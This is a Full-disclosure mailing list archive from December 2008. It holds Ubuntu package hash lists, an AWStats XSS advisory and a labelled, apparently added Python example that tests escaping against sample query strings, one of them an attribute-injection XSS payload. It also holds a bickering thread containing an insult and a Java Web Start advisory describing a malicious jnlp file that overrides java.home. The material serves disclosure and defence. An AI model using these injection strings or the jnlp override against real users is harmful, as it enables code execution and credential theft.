d0646a1543c51f14a93b40f972bc1569 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_amd64.deb Size/MD5: 163178 0378a25e3b2a0bc80ddb8ec720b5557d http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_amd64.deb Size/MD5: 75960 fcba461f2e2376cad515329791e04a17 http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_amd64.deb Size/MD5: 38512 21d9ecbc86a8e5965047d027e94fd324 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_i386.deb Size/MD5: 1556806 39e4f63b841c4b36c022017d66c12f58 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_i386.deb Size/MD5: 179478 5f08596ae997792920e238ff8cd2a7ba http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_i386.deb Size/MD5: 1098794 38bc61a5b403fb4f626a641a5f13e681 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_i386.deb Size/MD5: 157954 66e38c37639f3c68e7e4a933fa953ff3 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_i386.deb Size/MD5: 74116 50b3a4d0cfd38585d2711d30cf725e9d http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_i386.deb Size/MD5: 75038 98cdeec4b1014568b00107a82fc74418 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_lpia.deb Size/MD5: 1552018 d9dcab084f3b9bf3e8c36cb5db8f141e http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_lpia.deb Size/MD5: 141508 96061180809cccc975e0d7079e07ed3e http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_lpia.deb Size/MD5: 1171530 2d91048fe0a2ac9e3a4fddb84c67513e http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_lpia.deb Size/MD5: 155564 c67ba3aeb2535ee3e7fc4c89e90ba36a 
http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_lpia.deb Size/MD5: 74274 db05202893f516398bbe4e2153ef2d6e http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_lpia.deb Size/MD5: 35552 a75caf212ffb5a0eafe4ba2656c9aae1 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_powerpc.deb Size/MD5: 1874428 0ed8b5f4e6bad74d506d73447de00bd2 http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_powerpc.deb Size/MD5: 158374 dfcd7c4455b4bbd3f746368058d09a59 http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_powerpc.deb Size/MD5: 1238226 b5b3a81e956cdb14674d571694d1b6d0 http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_powerpc.deb Size/MD5: 185314 5e9d8bd56493f75ae8a8691c530aa420 http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_powerpc.deb Size/MD5: 83106 75dea32ec7152b7868fabf09d9d5a198 http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_powerpc.deb Size/MD5: 42928 214fe703fced2e387b48b51dcbb1d6b7 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-4ubuntu4.2_sparc.deb Size/MD5: 1760062 ade4c08289d947d092a5b2ab06517cc7 http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-4ubuntu4.2_sparc.deb Size/MD5: 143860 62b7260d618531b0ed5e7871ab7b99a9 http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-4ubuntu4.2_sparc.deb Size/MD5: 1159702 28ea81660bbdd9d7982be58d225e8814 http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-4ubuntu4.2_sparc.deb Size/MD5: 160236 196e493ce73905446a3764e73b99f332 http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-4ubuntu4.2_sparc.deb Size/MD5: 75518 f24e4b0e3e4a7d97c28da99cdc0a47a5 http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-4ubuntu4.2_sparc.deb Size/MD5: 38240 
873f5e820e381ec2254ed520bcd09af0 Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-7.1ubuntu6.1.diff.gz Size/MD5: 82260 85fb58aa81933f142bd937bca2e18341 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg-7.1ubuntu6.1.dsc Size/MD5: 1956 1ee06f6b731eae435af6a2d438ef909b http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/net-snmp_5.4.1~dfsg.orig.tar.gz Size/MD5: 4618308 0ef987c41d3414f2048c94d187a2baeb Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-base_5.4.1~dfsg-7.1ubuntu6.1_all.deb Size/MD5: 527650 9c56f3d70018b714895a61c0daba9498 http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/tkmib_5.4.1~dfsg-7.1ubuntu6.1_all.deb Size/MD5: 103060 108eb50387ca46b4ee38ebb8722ced88 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb Size/MD5: 1815638 82385081fe2d4eeb1a6c94f9dae672ad http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb Size/MD5: 146154 1b6249e02e89213f2f4d2aa9c9123420 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb Size/MD5: 1315628 8443e091f2c63485a422236ad23e55cd http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb Size/MD5: 165522 154a05824b98e041ceac60ac83709ef4 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb Size/MD5: 77914 8d6e328f309e78bf1fcf21c2633d82ec http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_amd64.deb Size/MD5: 39930 6b7a1a67ca63b5c843ce66f3547b3c89 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_i386.deb Size/MD5: 1569568 dd0599b150eccee9889325d17a7b0769 
http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_i386.deb Size/MD5: 184264 52a54aebef81648164a5bc90f27b0cc5 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_i386.deb Size/MD5: 1119072 10c81fe283b25e7ad31fcfd88a2325f0 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_i386.deb Size/MD5: 156112 6296f0836bc9797ff48810c79965c3a5 http://security.ubuntu.com/ubuntu/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_i386.deb Size/MD5: 74476 bd96a6915eb97fed083aac4daa5f07cf http://security.ubuntu.com/ubuntu/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_i386.deb Size/MD5: 77652 3e30e51c362dfa982a3b3197be081328 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb Size/MD5: 1557614 065f4575c7a2d257fa6b5b9d0cee454f http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb Size/MD5: 144292 b55f2c4aff8a86499d7f38fd6e773f44 http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb Size/MD5: 1184272 84116fefdce279ce338ffc9614384c06 http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb Size/MD5: 154444 ffe9e765a01695355bdb58008a2910f5 http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb Size/MD5: 73746 762e75672fbd395d2d159513f5d572b0 http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_lpia.deb Size/MD5: 36530 0a98b51b94a5f75d4131d657aa766579 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb Size/MD5: 1884632 a3ad023841ee605efa1e055712b44d9a http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb Size/MD5: 161074 5586adea8200d2d5bf81f288b5bf7be2 
http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb Size/MD5: 1249636 48ec688499fea1dc0ccb3091c0158fb8 http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb Size/MD5: 181952 8ef5f6b9b6c6b8e4fcd5cb37147304a2 http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb Size/MD5: 81802 965218126fb5a49cfcd9e20afeb49782 http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_powerpc.deb Size/MD5: 43048 09f2f9ed9f519ca5723411802e46d48b sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-dev_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb Size/MD5: 1759316 46455cc355c1b808243eada0f134d00b http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp-perl_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb Size/MD5: 145164 2cdb5b35db853c7c184a44022fc23cd8 http://ports.ubuntu.com/pool/main/n/net-snmp/libsnmp15_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb Size/MD5: 1159834 cfff424e5bff38bb3ef9419f03465388 http://ports.ubuntu.com/pool/main/n/net-snmp/snmp_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb Size/MD5: 163042 354f7a5423a34c411c5f8620c66d3e58 http://ports.ubuntu.com/pool/main/n/net-snmp/snmpd_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb Size/MD5: 76994 ca11bcf9a411f618e35e1d6b6ab8c8f9 http://ports.ubuntu.com/pool/universe/n/net-snmp/libsnmp-python_5.4.1~dfsg-7.1ubuntu6.1_sparc.deb Size/MD5: 38526 172493ec5df1866e2633e074c7f38775 -------------- next part -------------- A non-text attachment was scrubbed... 
From kees at ubuntu.com Thu Dec 4 00:16:57 2008
From: kees at ubuntu.com (Kees Cook)
Date: Wed, 3 Dec 2008 16:16:57 -0800
Subject: [Full-disclosure] [USN-686-1] AWStats vulnerability
Message-ID: <20081204001657.GV25309@outflux.net>

===========================================================
Ubuntu Security Notice USN-686-1          December 04, 2008
awstats vulnerability
CVE-2008-3714
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  awstats 6.5-1ubuntu1.3

Ubuntu 7.10:
  awstats 6.6+dfsg-1ubuntu0.1

Ubuntu 8.04 LTS:
  awstats 6.7.dfsg-1ubuntu0.1

Ubuntu 8.10:
  awstats 6.7.dfsg-5ubuntu0.1

In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Morgan Todd discovered that AWStats did not correctly strip quotes from certain parameters, allowing for an XSS attack when running as a CGI. If a user was tricked by a remote attacker into following a specially crafted URL, the user's authentication information could be exposed for the domain where AWStats was hosted.
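The advisory above gives no code for the flaw. The following added example (not AWStats code and not part of the advisory) illustrates the class of bug it describes: a CGI parameter whose quote characters survive filtering and is reflected into an HTML attribute, next to a hardened renderer and a parser-based regression check. The parameter name `filter`, the markup and the sample query strings are constructed for illustration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Hypothetical names for this example; none of them come from AWStats.
PARAM = "filter"
EXPECTED_ATTRS = {"type", "name", "value"}
TEMPLATE = '<input type="text" name="{name}" value="{value}">'

# Constructed sample query strings, URL-encoded as a CGI would receive them.
SAMPLES = [
    "filter=index.html",                    # ordinary value
    "filter=it%27s",                        # single quote
    "filter=x%22%20onfocus%3D%22alert(1)",  # double quote ends the attribute early
    "filter=%3Cb%3Ebold%3C%2Fb%3E",         # angle brackets
]


def _param(query_string):
    """Decode the query string and return the parameter under test."""
    return parse_qs(query_string, keep_blank_values=True).get(PARAM, [""])[0]


def render_weak(query_string):
    """Weak form: removes angle brackets but leaves quote characters alone."""
    value = _param(query_string).replace("<", "").replace(">", "")
    return TEMPLATE.format(name=PARAM, value=value)


def render_hardened(query_string):
    """Hardened form: encodes &, <, > and both quote characters for attribute context."""
    value = html.escape(_param(query_string), quote=True)
    return TEMPLATE.format(name=PARAM, value=value)


class _FirstInput(HTMLParser):
    """Collects the attributes of the first <input> element in a page."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = dict(attrs)


def parse_input(page):
    """Return the attribute dict of the rendered <input>, as a browser-like parser sees it."""
    parser = _FirstInput()
    parser.feed(page)
    parser.close()
    return parser.attrs or {}


def audit(render, samples=SAMPLES):
    """Return (query_string, problem) for every sample the renderer mishandles.

    A sample fails if the parsed element gained attributes the template never
    declared, or if the value no longer equals what the client sent.
    """
    findings = []
    for qs in samples:
        attrs = parse_input(render(qs))
        extra = sorted(set(attrs) - EXPECTED_ATTRS)
        if extra:
            findings.append((qs, "injected attributes: " + ", ".join(extra)))
        elif attrs.get("value") != _param(qs):
            findings.append((qs, "value altered in transit"))
    return findings


if __name__ == "__main__":
    for name, render in (("weak", render_weak), ("hardened", render_hardened)):
        print(name, audit(render))
```

The check parses the rendered output rather than searching it for substrings, so it reports the structural effect of an unescaped quote (an attribute the template never declared) and can be kept as a regression test for any reflected parameter.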
From mike at technomonk.com Wed Dec 3 20:17:50 2008
From: mike at technomonk.com (Mike Preston)
Date: Wed, 03 Dec 2008 20:17:50 +0000
Subject: [Full-disclosure] Project Chroma: A color code for the state of cyber security
In-Reply-To:
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com>
Message-ID: <4936E96E.2030005@technomonk.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Mike C wrote:
| On Mon, Dec 1, 2008 at 5:27 PM, rholgstad wrote:
|> and how does making a color based on these inputs protect people?
|>
|
| Once all desktops have an icon or widget (say at the right hand
| corner) with the color, and this is consistently seen everywhere, the
| users will start associating with their online security. they will be
| reminded that they have to be careful with the data they share.
|
| This, if implemented correctly will be a boon to security industry,
| where the weakest kinks currently are 'n00b' users.
|
So if it's condition green I can turn off my firewall and antivirus and surf risk free?! Whoo Hoo!

Mike
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkk26W4ACgkQvhwPecbXDdyR8gCfZ5bbvwn01aRCcP5oqPE2GAT5
c+kAn3TAYtGY1o6ojoLXpDo7VIEQlTjn
=Mskr
-----END PGP SIGNATURE-----

From mike.cartall at gmail.com Thu Dec 4 02:43:01 2008
From: mike.cartall at gmail.com (Mike C)
Date: Wed, 3 Dec 2008 18:43:01 -0800
Subject: [Full-disclosure] Project Chroma: A color code for the state of cyber security
In-Reply-To:
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> <49356766.9050307@gmail.com>
Message-ID:

On Tue, Dec 2, 2008 at 9:13 AM, Chris Jeane wrote:
> If you are taking a proactive approach to security, maybe you should always
> remind the user to be careful with their data.
> How about 'all desktops have an icon or widget (say at the right hand
> corner)' that flashes red every five minutes and says 'be careful with the
> data you share.' This solution removes the overhead of all that pesky
> monitoring and data mining.
>

This would be far more obtrusive than required. Not what would be the most effective.

> The internet is a dangerous place, and will continue to be. My 'noob'
> grandmother doesn't need a 1-5 Danger Scale to keep her from being scammed
> when she buys holiday gifts online. [Grandmother Voice] 'Ohh dear we are at
> Internet Danger Level: Tangerine, guess I can't order those knit socks for
> Johnny today.' [End Grandmother Voice]
>

I hope you would think a little bigger than that. Unfortunately, that is too much to hope for?
--
MC
Security Researcher
Lead, Project Chroma
http://sites.google.com/site/projectchromaproject/

From mike.cartall at gmail.com Thu Dec 4 02:43:53 2008
From: mike.cartall at gmail.com (Mike C)
Date: Wed, 3 Dec 2008 18:43:53 -0800
Subject: [Full-disclosure] Project Chroma: A color code for the state of cyber security
In-Reply-To: <4936E96E.2030005@technomonk.com>
References: <70D072392E56884193E3D2DE09C097A9FA31@pascal.zaphodb.org> <49341071.4050608@gmail.com> <4936E96E.2030005@technomonk.com>
Message-ID:

On Wed, Dec 3, 2008 at 12:17 PM, Mike Preston wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Mike C wrote:
> | On Mon, Dec 1, 2008 at 5:27 PM, rholgstad wrote:
> |> and how does making a color based on these inputs protect people?
> |>
> |
> | Once all desktops have an icon or widget (say at the right hand
> | corner) with the color, and this is consistently seen everywhere, the
> | users will start associating with their online security. they will be
> | reminded that they have to be careful with the data they share.
> |
> | This, if implemented correctly will be a boon to security industry,
> | where the weakest kinks currently are 'n00b' users.
> |
> So if its condition green I can turn off my firewall and antivirus and
> surf risk free?!
>

If it ever does :)!

With the current state of the industry, I don't think that time will come in the near future.

--
MC
Security Researcher
Lead, Project Chroma
http://sites.google.com/site/projectchromaproject/

From mike.cartall at gmail.com Thu Dec 4 02:45:59 2008
From: mike.cartall at gmail.com (Mike C)
Date: Wed, 3 Dec 2008 18:45:59 -0800
Subject: [Full-disclosure] Project Chroma: A color code for the state of cyber security
In-Reply-To: <20081202192922.62A6C118041@smtp.hushmail.com>
References: <20081202192922.62A6C118041@smtp.hushmail.com>
Message-ID:

On Tue, Dec 2, 2008 at 11:29 AM, Elazar Broad wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
>
>
> On Tue, 02 Dec 2008 11:50:46 -0500 rholgstad
> wrote:
>>Mike C wrote:
>>> On Mon, Dec 1, 2008 at 5:27 PM, rholgstad
>>wrote:
>>>
>>>> and how does making a color based on these inputs protect
>>people?
>>>>
>>>>
>>>
>>> Once all desktops have an icon or widget (say at the right hand
>>> corner) with the color, and this is consistently seen
>>everywhere, the
>>> users will start associating with their online security. they
>>will be
>>> reminded that they have to be careful with the data they share.
>>>
>>> This, if implemented correctly will be a boon to security
>>industry,
>>> where the weakest kinks currently are 'n00b' users.
>>>
>>>
>>you are joking right?
>>
>>So some widget is going to stop the next SMB remote or IE client
>>side
>>and protect the 'n00b' users? Please explain how this works. Also
>>please
>>explain how "they will be reminded that they have to be careful
>>with the
>>data they share. " has anything to do with protecting a users
>>machine
>>from being compromised.
>
> Thats the whole point. There is a fine line between using visual
> alerts to put people(Joe six pack) into a state of "awareness"(more
> like mild hysteria) of a threat versus knowing how to protect
> oneself against that threat and using that awareness indicator as
> the kick in the ass to get moving and shore up the defenses(hell,
> how many security folk do this too, then again, every time
> something goes bump we see red). Visual alerts are great at
> persuasion tools, especially when the goal is to get Joe to buy
> your latest all-in-one-will-make-your-coffee-and-buy-you-beer
> AV/Malware/Spyware/Foo(whats this doing here?)/evil monkey in the
> closet package. So of course, Joe will never learn how to properly
> defend his computer/data, and the "industry" will prosper.
>

I don't think it is a lost battle. This method could prove an excellent way to solve this age old problem.

> Now, thanks to our good friends over at the DHS, the color system
> has turned into a complete and utter joke(for the most part), so my
> friend, you see, this a complete exercise in futility(besides the
> fact that every friggin AV/IDS/Security/SIM company out there has
> red, yellow and green as their corporate "flag", if you are just
> joining the party, then you can completely ignore this)
>

DHS implementation leaves a lot to be desired. Please do not compare this to DHS's implementation.

> If you really want to change state of security for the n00bs,
> spread the knowledge, not the colors.
>

That's what project Chroma is all about.. Are you on board?!
--
MC
Security Researcher
Lead, Project Chroma
http://sites.google.com/site/projectchromaproject/

From mike.cartall at gmail.com Thu Dec 4 02:47:07 2008
From: mike.cartall at gmail.com (Mike C)
Date: Wed, 3 Dec 2008 18:47:07 -0800
Subject: [Full-disclosure] News for Ureleet
In-Reply-To: <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com>
References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com>
Message-ID:

Hey Guys,

I thought we had settled the issues offline. Let's restart our discussions.. this bickering is highly unnecessary on the list.

--
MC
Security Researcher
Lead, Project Chroma
http://sites.google.com/site/projectchromaproject/

From mike.cartall at gmail.com Thu Dec 4 02:49:24 2008
From: mike.cartall at gmail.com (Mike C)
Date: Wed, 3 Dec 2008 18:49:24 -0800
Subject: [Full-disclosure] Iran executes IT expert who spied for Israel
In-Reply-To: <6158bb410812030655m3d8f88adj5a7c3f5084dad4c1@mail.gmail.com>
References: <4b6ee9310812030153x359463eaq74e89623c2317a9f@mail.gmail.com> <4b6ee9310812030348m1bf5250cj45f0486c1bcb766@mail.gmail.com> <6158bb410812030655m3d8f88adj5a7c3f5084dad4c1@mail.gmail.com>
Message-ID:

On Wed, Dec 3, 2008 at 6:55 AM, Ureleet wrote:
> hes not a troll andrew. he brings up good points. u nd i are the
> only trolls here. i only troll u. you troll every1.
>

Yes, acceptance is the first stage of recovery for the both of you. Let us continue with the offline discussions.
--
MC
Security Researcher
Lead, Project Chroma
http://sites.google.com/site/projectchromaproject/

From ghosts at gmail.com Thu Dec 4 03:23:34 2008
From: ghosts at gmail.com (ghost)
Date: Wed, 3 Dec 2008 22:23:34 -0500
Subject: [Full-disclosure] News for Ureleet
In-Reply-To:
References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com>
Message-ID: <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com>

Hey mike, how about you stop playing moderator you fucking douche bag. I for one believe netdev brings a lot to this list and encourage him and ureleet to continue posting.

On Wed, Dec 3, 2008 at 9:47 PM, Mike C wrote:
> Hye Guys,
>
> I though we had settled the issues offline. Lets restart our
> discussions.. this bickering is highly unnecessary on the list.
>
> --
> MC
> Security Researcher
> Lead, Project Chroma
> http://sites.google.com/site/projectchromaproject/
>

From vulcanius at gmail.com Thu Dec 4 03:48:47 2008
From: vulcanius at gmail.com (vulcanius)
Date: Wed, 3 Dec 2008 22:48:47 -0500
Subject: [Full-disclosure] Project Chroma: A color code for the state of cyber security
In-Reply-To:
References: <20081202192922.62A6C118041@smtp.hushmail.com>
Message-ID:

How exactly is a list of 5 colors going to educate the world about the need for, and proper implementation of, security measures? And be specific, stop with the vagueness already.

On Wed, Dec 3, 2008 at 9:45 PM, Mike C wrote:
>
> Thats what project Chroma is all about.. Are you on board?!
>
> --
> MC
> Security Researcher
> Lead, Project Chroma
> http://sites.google.com/site/projectchromaproject/
>

From luke.scharf at clusterbee.net Thu Dec 4 03:57:27 2008
From: luke.scharf at clusterbee.net (Luke Scharf)
Date: Wed, 03 Dec 2008 21:57:27 -0600
Subject: [Full-disclosure] Project Chroma: A color code for the state of cyber security
In-Reply-To:
References: <20081202192922.62A6C118041@smtp.hushmail.com>
Message-ID: <49375527.3070804@clusterbee.net>

Mike C wrote:
>> If you really want to change state of security for the n00bs,
>> spread the knowledge, not the colors.
>>
>>
> Thats what project Chroma is all about.. Are you on board?!
>

This already exists, backed up by some hard-core security competence:
http://isc.sans.org/infocon.html
http://isc.sans.org/

Has it changed the world?

-Luke

From advisories at vsecurity.com Thu Dec 4 04:13:54 2008
From: advisories at vsecurity.com (VSR Advisories)
Date: Wed, 3 Dec 2008 20:13:54 -0800
Subject: [Full-disclosure] CVE-2008-2086: Java Web Start File Inclusion via System Properties Override
Message-ID: <20081204041354.GK2478@sentinelchicken.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Java Web Start File Inclusion via System Properties Override
Release Date: 2008-12-03
Application: Sun Java Runtime Environment / Java Web Start
Versions: See below
Severity: High
Author: Timothy D. Morgan
Vendor Status: Patch Released [3]
CVE Candidate: CVE-2008-2086
Reference: http://www.vsecurity.com/bulletins/advisories/2008/JWS-props.txt
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description
- -------------------
- From [1]:

"Using Java Web Start technology, standalone Java software applications can be deployed with a single click over the network. Java Web Start ensures the most current version of the application will be deployed, as well as the correct version of the Java Runtime Environment (JRE)."

Vulnerability Overview
- ----------------------
On March 27th, VSR identified a vulnerability in Java Web Start related to the execution of privileged applications. This flaw could allow an attacker to execute arbitrary code on a victim system if a user could be convinced to visit a malicious web site.

Product Background
- ------------------
Java Web Start (JWS) applications are launched through specially formatted XML files hosted on web sites with a "jnlp" file extension. These files reference one or more "jar" files which are meant to be downloaded and executed by client systems. JWS applications are run in unprivileged mode by default but may be run with full user privileges if the jnlp file requests this access. Privileged JWS applications must have each jar file signed by the same trusted author in order to be executed. However, jnlp files are not signed and may be hosted by third-party web sites.

In addition to specifying application components, the jnlp specification permits application authors to supply certain System properties which may be retrieved by the application through the System.getProperty() and System.getProperties() methods. Besides any user-supplied properties, the Java VM also provides access to a number of sensitive runtime settings through this interface. More information on the jnlp format may be found in [2].

Vulnerability Details
- ---------------------
VSR discovered an unsafe behavior in the way properties are interpreted when specified in jnlp files. In certain versions of the Java Runtime Engine (JRE), values supplied through jnlp files override existing system defaults. Thus far, VSR has verified the following System properties may be overridden:

  java.home
  java.ext.dirs
  user.home

Of particular interest are the java.home and java.ext.dirs properties. If an attacker could lure a victim to open a malicious jnlp file which references a trusted application, it may be executed without any confirmation by the user. However, as the application attempts to load classes, it may trust the malicious java.home and/or java.ext.dirs value. These paths could point to a malicious local or remote JRE or extensions installation. It appears that under Windows, UNC network paths may be used for the java.home value. It is not yet known whether or not UNC paths may be used for java.ext.dirs.

During testing, VSR found that Java Cryptography Extension (JCE) classes failed to load when java.home was set to an invalid path. However, by setting this path to a network share which hosted a valid JRE installation, the JCE classes loaded correctly. If such a network share were hosted by the attacker, then arbitrary code could potentially be loaded without restrictions, unbeknownst to the victim.

The following XML shows what a malicious jnlp file might look like. Note that the malicious jnlp file would likely be very similar to the ones users normally rely on with certain properties overridden in the resources section.

Trusted Application Trusted Vendor Trusted Application by Trusted Vendor

To fully exploit this specific attack vector, an attacker would need to remotely or locally host a malicious version of classes used by a trusted application and then lure a user into opening a malicious jnlp file.
